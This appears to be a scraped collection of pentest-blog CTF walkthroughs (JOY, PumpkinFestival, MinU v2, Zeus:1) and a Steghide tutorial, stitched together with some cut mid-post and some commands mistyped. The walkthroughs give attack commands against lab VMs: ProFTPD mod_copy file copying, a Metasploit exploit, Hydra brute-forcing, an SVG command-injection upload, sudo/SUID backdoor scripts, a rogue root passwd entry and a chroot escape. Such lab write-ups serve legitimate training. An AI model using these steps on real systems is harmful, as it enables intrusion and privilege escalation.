So, we connect to ftp where here I find two directories /download and /upload. The upload directory has read and write permission whereas the /download has read permission. So, we try to access /download directory and found a file within it name “directory”.

ftp 192.168.1.104

cd /download

get directory

Thus, we copied the file named as directories in our local machine.

So, by reading directory file, you will evaluate that, this file gave a brief idea about Patrick’s directory where Patrick should be the user account. In this we look at a file name “version_control” it could be considered as a suspect.

Since the version_control exist inside Patrick’ s directory so we cannot grab the file directly therefore I try to transfer version_control file inside /upload directory because it has read/write permission through ftp anonymous login.

telnet 192.168.1.104 21

site cpfr /home/patrick/version_control

site cpto /home/ftp/upload/version_control

Hence you can observe with the help of above command we had copied “version_control” inside /upload folder.

Further we navigate to /upload/version_control and found version of ftp service running on host machine moreover we obtained the path for webroot i.e. /var/www/tryingharderisjoy.

Exploit

So, we search for exploit for proftpd and found Metasploit module thus we execute following command to get session of the host machine.

use exploit/unix/ftp/proftpd_modcopy_exec

msf exploit(unix/ftp/proftpd_modcopy_exec) > set rhosts 192.168.1.104

msf exploit(unix/ftp/proftpd_modcopy_exec) > set SITEPATH /var/www/tryingharderisjoy.

msf exploit(unix/ftp/proftpd_modcopy_exec) > exploit

We successfully obtained the command shell of remote machine, now it was time for post enumeration to step towards privilege escalation. Thus, we import python one-liner to access proper tty shell and start with directory traversing.

It feels good when we dig-out credential of Patrick from inside the /ossec/patricsecretofjoy.

credentials for JOY:

patrick:apollo098765

root:howtheheckdoiknowwhattherootpasswordis

Privilege Escalation

Without wasting time, we switch as Patrick and check for its sudo rights if assigned for him. Here we found that Patrick can run /home/patrick/script/test as sudo user. So, when we run the test script, it gave nothing useful as it was demo to test working bash script thus the file “test” was useless but it own by root user which was doubtful for us.

So we decided to replace /test script with other malicious script but there was no writable permission on /script directory.

Thus, again we decided to use FTP anonymous login for replacing genuine /test file with bogus /test file which will be a backdoor to provide higher privilege shell.

Therefore, we created a malicious file to get bash shell with the help of command given and named as “test” then try to upload it inside /upload directory since it was writable folder.

echo "awk 'BEGIN {system(\"/bin/bash\")}'"> test

Once again with the help of telnet let’s connect to ftp service running on the host machine and execute the following command to inject malicious script “test” inside /home/Patrick/script.

telnet 192.168.1.104 21

site cpfr /home/ftp/upload/test

site cpfr /home/Patrick/script/test

So now we have injected the malicious file inside /script and user Patrick has sudo right to execute the /script/test as super user. Now let’s escalate the privilege by execute following command and finish the task assigned by author.

sudo /home/Patrick/script/test

Hmmmmm!! so we have spawn root shell successfully, now let’s move inside /root directory and grab proof.txt file and secret file.

cd /root

cat proof.txt

author-secret.txt

PumpkinFestival is another CTF challenge from the series of Mission-Pumpkin v1.0 created by keeping beginners in mind and all credit for this VM goes to Jayanth. This level is all about collecting 10 pumpkin tokens gain the root access to collect the PumpkinFestival_Ticket.

You can download it from HERE

Level: Beginner to Intermediate

Penetrating Methodology:

1. Scanning

· NMAP

2. Enumeration

· FTP

· WPScan

· DirBuster

· Enum4linux

· Hydra

3. Exploitation

· SSH

4. Privilege Escalation

· Exploiting Sudo rights

Walkthrough:

Scanning:

Let’s start off with the scanning process. This target VM took the IP address of 192.168.1.101 automatically from our local wifi network.

Then as usual we used our favorite tool Nmap for port scanning. We found that port 21, 80 is open and ssh is running on port 6880.

nmap -p- -A 192.168.1.101

Token 1:

Anonymous login is enabled on the ftp. So we tried to login using anonymous:anonymous.

Upon successful login we traversed through different directories and found our first token 2d6dbbae84d724409606eddd9dd71265inside token.txt file.

ftp 192.168.1.101

cd secret

get token.txt

bye

cat token.txt

Token 2:

Port 80 is open on the target system, we opened the ip address in our browser we didn’t get aby token but got a word named Alohomera!Which might be useful later on.

We checked for the page source of the page and got our second token

45d9ee7239bc6b0bb21d3f8e1c5faa52.

In the page source only we also found one username Harry which we will use in the later stage.

Token 3:

In the nmap scan earlier we have got few directories, we tried to access each one of them one by one.

From the /store/track.txt we found one username admin and a domain namepumpkin.local.

We mapped the domain name with the target machine’s ip address in the /etc/hosts file.

After that we accessed the pumpkin.local from the browser it came out to be another wordpress site and got one more flag 06c3eb12ef2389e2752335beccfb2080.

Token 4:

There is one more directory which we got from the namp scan named /token.

We couldn’t find anything inside this directory using different directory brute forcing tool but we were still curious that there must be something inside this directory. So we did number of hit and trials and finally got our fourth token 2c0e11d2200e2604587c331f02a7ebea in token.txt.

Token 5:

Since we have a wordpress site running under pumkin.local domain name, we tried wpscan and got a file named readme.html.

wpscan –url http://pumpkin.local-e at -e ap u

We also got two usernames admin & morse for the wordpress site which we will use to access the admin login of the site later on.

After accessing the url pumpkin.local/readme.html we got some code.

We tried to crack it online and it was a base62 code which gave us a password Ug0t!TrIpyJ for user morse & jack.

As we have got the password for the morse, we logged in to the wp-admin and got our 5^th token 7139e925fd43618653e51f820bc6201b

Token 6:

Since we have one more wp-admin user named admin and if you remember we also have got a keyword earlier named Alohomera! we tried this as our password to login into wordpress site and were successfully able to do so and eventually got our 6^th token f2e00edc353309b40e1aed18e18ab2c4

Token 7:

It’s always a good practice to use multiple tools for bruteforcing to get more reliable and add on results.

We used DirBuster to bruteforce the url http://pumpkin.local and got one more directory named license.txt

Accessing the same directory in the browser gave us one more token 5ff346114d634a015ce413e1bc3d8d71

Token 8:

We have a total of four users admin, morse, jack & harry with passwords only for only three.

So we tried to get the password of harry by bruteforcing using hydra. We got a password yrrah.

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.1.101 ftp -e nsr

We logged into ftp of the target machine using these credentials and found the 8^th token ba9fa9abf2be9373b7cbd9a6457f374e

ftp 192.168.1.101

get token.txt

bye

cat token.txt

Token 9:

In the above screenshot you can see that there is a directory named /Donotopen , we went inside this directory and found another directory named /NO and after a lot of traversing we finally found the file name token.txt. We downloaded the file into our system and got the 9^th token 8d66ef0055b43d80c34917ec6c75f706

cd Donotopen

cd NO

cd NOO

cd NOOO

cd NOOOO

get token.txt

bye

cat token.txt

Token 10:

It’s time to get the 10^th token. Let’s HUNT!

From the above scree you might have seen there is one more directory /NOOOOO and after some traversing found a file a file data.txt. We downloaded the file into our kali and found some random codes inside.

Cd NOOOOOO

bye

get data.txt

We checked for the file type and it is tar file. We untar the file and got another file data.

That file also came out to be a zip file and after unzipping we got a file key and after untaring that, we finally got a file named jack which had hexdump inside.

file data.txt

tar vxf data.txt

tar xjf data

tar vxf key

cat jack

Then we used xxd to covert and patch the hexdump into binary.

We got an ssh private key.

Xxd -r -p jack

As we have got an ssh key, what we did is we used this key to ssh login the target machine on port 6808 with user jack.

After successful login we found our final and 10^th token 8d66ef0055b43d80c34917ec6c75f706

chmod 600 sshkey

ssh jack@192.168.1.101-i sshkey -p 6808

file token

./token

sudo -l

Privilege Escalation/PumpkinFestival_Ticket:

From the above screenshot we can see jack has sudoer permission for alohomora file.

Now to get the root shell and then finally get the PumpkinFestival_Ticket we will exploit the sudoer permissions of jack.

We checked for the pumpkins directory but couldn’t find any, so we created a directory named pumpkins and then using echo command we created a file named alohomora with /bin/bash copied in it.

We then gave it execution permissions and tried to execute the file as sudoer and we successfully got the root shell and eventually the PumpkinFestival_Ticket which completes our challenge.

mkdir pumpkins

echo “/bin/sh” > /home/jack/pumpkins/alohomora

chmod 777/home/jack/pumkins/alohomora

cd /root

cat PumpkinFestival_Ticket

Today we are going to take another CTF challenge Minu:v2. The credit for making this VM machine goes to “8bitsec” and it is a boot2root challenge where we have to root the server and capture the flag to complete the challenge. You can download this VM here.

Security Level: Beginner

Penetrating Methodology:

1. Scanning

· Netdiscover

· NMAP

2. Enumeration

· Web Directory search

3. Exploitation

· Command Injection

· SSH

4. Privilege Escalation

· Exploiting Suid rights

Walkthrough:

Scanning:

Let’s start of by scanning the network and identifying host IP address. We can identify our host IP as 192.168.1.101 by using Netdiscover.

netdiscover

Then as usual we used our favorite tool Nmap for port enumeration. We found that port 22 and 3306 are open.

And we observed that on port 3306 http service was running.

nmap -A 192.168.1.101

Enumeration:

We found nothing useful on the index page so we used dirb for brute forcing and found one directory with .html extension.

dirb http://192.168.1.101/3306 -X .html

We tried to access the url and found that it is an upload page and accepts only .svg files as input.

So we took help of the google to find any script in svg format which we can utilize for command injection.

After doing some research we found on such script in which we are injecting /etc/passwd command. We copied the script and saved it as .svg file.

Exploitation:

We tried to upload the script file and it got successfully uploaded. And after uploading we checked for the page source and got the output of /etc/passwd file.

We came to know that the target has multiple users like employee, chrony, nobody etc.

We thought of exploring other commands using the same script.

Since the target machine is using the /bin/ash shell, we thought of checking the shell history in the /.ash_history directory by editing the script file.

After editing we uploaded the file and got some useful information from the history file, which gave us a username and a password.

So we tried to ssh the target machine with username employeeand a password superultrapass3 which we got above and were successfully able to login.

After logging in we checked for the suid permissions for privilege escalation and got one file with name micro which came out to be an editor tool.

ssh employee@192.168.1.101

find / -perm -u=s -type f 2>/dev/null

/usr/bin/micro

Privilege Escalation:

We tried to pipe the contents of /etc/passwd file into macro editor where we can edit or add new users with root privileges

Cat /etc/passwd | /usr/bin/micro

We created the password for the new user using openssl tool.

Openssl passwd -1 -salt user3 pass123

After that we added the new user test and hashed password with root privileges into the /etc/passwd file and saved it.

Once we had a user with root privileges we switched to that user and successfully got the shell with root shell and eventually got the flag.

su test

cd /root

cat flag.txt

In this article, we'll learn about Steghide. There are various steganography tools available but the part that differentiates it is that it uses a variety of algorithms to encrypt the data. Moreover, Steghide supports to hide data behind any image(jpg/jpeg/png/gif/bmp), audio (mp3/wav), excel, etc.

Table of Content

· Introduction to Steganography

· Introduction to Steghide

· Features

· Installation of Steghide

· Getting Start with Steghide

· Functionality of Steghide

o Embedding of Data Via Steghide

o Extraction of Data Via Steghide

o Password Protect Files

o Retrieve Information of Embedded File

o Verbose Mode

o Compression Mode

o Anti-compression Mode

o Embedding File Without Name

o Encrypting Algorithms

o Overwriting the Existing File

Introduction to Steganography

In digital steganography, electronic communications may incorporate steganographic coding inside of a transport layer, such as a document file, picture file, program or convention. Media records are perfect for steganographic transmission since of their expansive estimate. For instance, a sender might begin with a harmless picture and make few alterations to it in order to hide data, so that, this alteration goes unnoticed for someone who is not particularly seeking out for it.

The upside of steganography over cryptography alone is that the planned mystery message does not stand out to itself as an object of examination. Clearly obvious scrambled messages—regardless of how unbreakable—stimulate intrigue, and may in themselves be implicating in nations where encryption is illicit. In this manner, while cryptography is the act of securing the substance of a message alone, steganography is worried about hiding the way that a mystery message is being sent, just as disguising the substance of the message.

Introduction to Steghide

Steghide may be a steganography device which permits you to cover up confidential records inside a picture or sound record with a passphrase. Bolsters BMP and JPEG picture groups, AU and WAV sound groups. By default, its employments Rijndael calculation to scramble the record and the key measure is 128 bits. This tool has its advantages and disadvantages. One upside is that it is significantly better at covering up and can without much of a stretch shroud any document type. It does as such by utilizing a propelled calculation to shroud it inside the picture (or sound) record without changing the look (or sound) of the document. This additionally implies without utilizing steghide (or if nothing else a similar scientific methodology as steghide) it is hard to extricate the concealed documents from the picture.

Features

· Compression of embedded data

· BMP, GIF and JPG supported

· Encryption of embedded data

· Decryption via password

· Uses various algorithms for encryption

INSTALLATION

Let's start with the installation of steghide. In windows, we can download steghide from http://steghide.sourceforge.net/download.php. After downloading we have to simply unzip the files and use it through the cmd. In linux, open your terminal and type the following command to download Steghide :

apt-get install steghide

Getting Started with Steghide

To start Steghide, the most basic option we use the help command. This command will display us all the options that Steghide provides us.

steghide --help

Embedding Data in The Image

We hide data in the image using Steghide so that only the person who acknowledges it can read that. So, we made a text file named as user.txt in which we wrote our confidential data and image.jpeg is that file in which we are embedding our data. To achieve this, we'll be executing the following command:

steghide embed -ef -cf

Here, ef and cf is termed as embedded file and cover file respectively.

Extraction of Data Via Steghide

Using Steghide adds an extra layer of security by allowing us touse a password for it. Now, to extract the hidden data use the following command :

steghide extract-sf

Then enter the password in order to extract the file.

Here,

sfis secret file

Password Protect Files

Now, we can also extract the files using the following command. This command is different is that it specifies password in the command itself, therefore, we do not need to specify it separately.

steghide embed -ef -cf -p

Retrieve Information of Embedded File

If we have an image that is suspected to have data hidden and if so, then which algorithm is used to encrypt the data in the file. Then we will use the following command :

steghide info

VERBOSE MODE

To get each and every information of a file during its extraction, we can use the verbose mode. Verbose mode gives you detailed information. We can use verbose mode by executing the following command :

steghide embed -v -ef -cf

COMPRESSION MODE

Now if we want to compress text file before hiding it then we would use the following command. The compression level can vary from 1 to 9. The first level gives you speed to compress whereas at 9th level, it will provide you with best compression techniques.

steghide embed -ef -cf -z 2

Anti Compression Mode

Now if we don't want to compress a file before hiding it then we will use the following command :

steghide embed -ef -cf -Z

Embedding File Without Name

We can also hide a file without naming it. We will use this command :

steghide embed -ef -cf -N

Encrypting Algorithms

We can encrypt the data that we are hiding by using encryption techniques. And this can be easily achieved by just using the following command :

steghide embed -ef -cf -e

Overwriting the Existing File

When extracting the file let’s assume we have already have a file in the same directory with the same name. then we can use the following command to overwrite the existing file if that is desired. And for this use the following command :

steghide extract -sf -f

Conclusion

So, this was the short guide about Steghide. And as you can see, it is an easy tool for steganography. Its also user friendly. It has, therefore, become one of the finest steganography tools for extracting and embedding information in a multitude of media files Steghide has many uses and its other notable characteristics such as file encryption make it one of the finest steganography.

Today we are going to take another CTF challenge Zeus:1 . The credit for making this VM machine goes to “Vesile Revnic” and it is a boot2root challenge where we have to root the server and capture the flags to complete the challenge. You can download this VM here

Security Level: Intermediate

Penetrating Methodology:

1. Scanning

· NMAP

2. Enumeration

· Dirb

3. Exploitation

· Hydra

· SSH

· Jailkit

4. Privilege Escalation

· Exploiting Suid rights

Walkthrough:

Scanning:

Let’s start off with the scanning process. This target VM has a static IP address set as 192.168.131.170. So we created a vm network same as this and put our kali machine in the same network.

Then as usual we used nmap for port and service enumeration.

And we have ports 21, 22 and 80 open on the target machine.

nmap -A 192.168.131.170

Enumeration:

As we can see port 80 is open, we tried to open the IP address in our browser but we didn’t find anything useful on the webpage.

We took the help of dirb to directory bruteforce the webpage and got one directory named /telecom/

So we tried to access the url in the browser but didn’t find anything.

We looked for the page source and got a name called goguwhich we can try as a username.

Exploitation:

We have hopefully got a username so we tried to bruteforce the ssh port and successfully got a password universal for the user gogu.

So we logged in the target machine using ssh with the above found credentials and got our first user.txt flag.

What we found that user gogu was able to run only limited commands because the creator of the machine hasimplemented jailkiton this user.

Note: Jailkit is implemented to limit the bash shell of any particular user.

ssh gogu@192.168.131.170

cat user.txt

ls -la

We looked for any hidden files and got one file named sysdate which had suid bit set on it.

Sysdate command gave us the current date and time. We tried to use path variable method to leverage the suid of sysdate but we were still not getting out of the restricted shell maybe because of the jailkit implementation.

ls -lRah

echo “/bin/sh/ “ > date

chmod 777 date

export PATH=/home/gogu:$PATH

/home/gogu/…/sysdate/

We looked on the google to find anyway around to bypass the jailkit and got one c-script. We save the file as bypass.c in our kali. Then tried to compile it. It was asking for some libraries so we installed the dependencies and were able to compile it after that.

Reference:https://filippo.io/escaping-a-chroot-jail-slash-1/

apt install gcc-multilib -y^C

gcc bypass.c -o bypass -m32

Privilege Escalation:

After compiling the file what we did is we tarnsfered the bypass script file into the target machine and the executed with root privileges using the path variable methodology.

After execution we successfully came out of the restricted shell and also got the root shell and eventually the root flag.

ssh gogu@192.168.131.170“cat> bypass”

ssh gogu@192.168.131.170

chmod bypass

echo :/home/gogu/bypass” >date

chmod date

export PATH=/home/gogu/…/sysdate:$PATH

/home/gogu/…/sysdate

cd root

cat flag.txt

PumpkinGarden: Vulnhub Walkthrough

dirb http://192.168.0.14:1515/

Linux for Pentester: pip Privilege Escalation

Exploiting Sudo rights

Hack the Box: Netmon Walkthrough

PumpkinRaising : Vulnhub Walkthrough

Escalate_Linux: Vulnhub Walkthrough (Part 1)

Walkthrough:

Scanning:

Linux for Pentester: sed Privilege Escalation

Exploiting Sudo rights

Matrix-3: Vulnhub Walkthrough

Walkthrough:

Steganography: The Art of Concealing

Linux for Pentester: ed Privilege Escalation

Exploiting Sudo rights

Retina: A Network Scanning Tool

Symfonos:2 Vulnhub Walkthrough

Walkthrough:

EvilOSX-RAT for MacOS/OSX

ExifTool : A Meta-Data Extractor

Table of Content

Introduction

Installation

Hack the Box: Friendzone Walkthrough

Beast 2: Vulnhub Walkthorugh

Walkthrough:

Dgitalworld.local: JOY Vulnhub Walkthorugh

Mission-Pumpkin v1.0: PumpkinFestival Vulnhub Walkthrough

Walkthrough:

MinU: v2 Vulnhub Walkthrough

Walkthrough:

Comprehensive Guide to Steghide Tool

Zeus:1 Vulnhub Walkthrough

Walkthrough: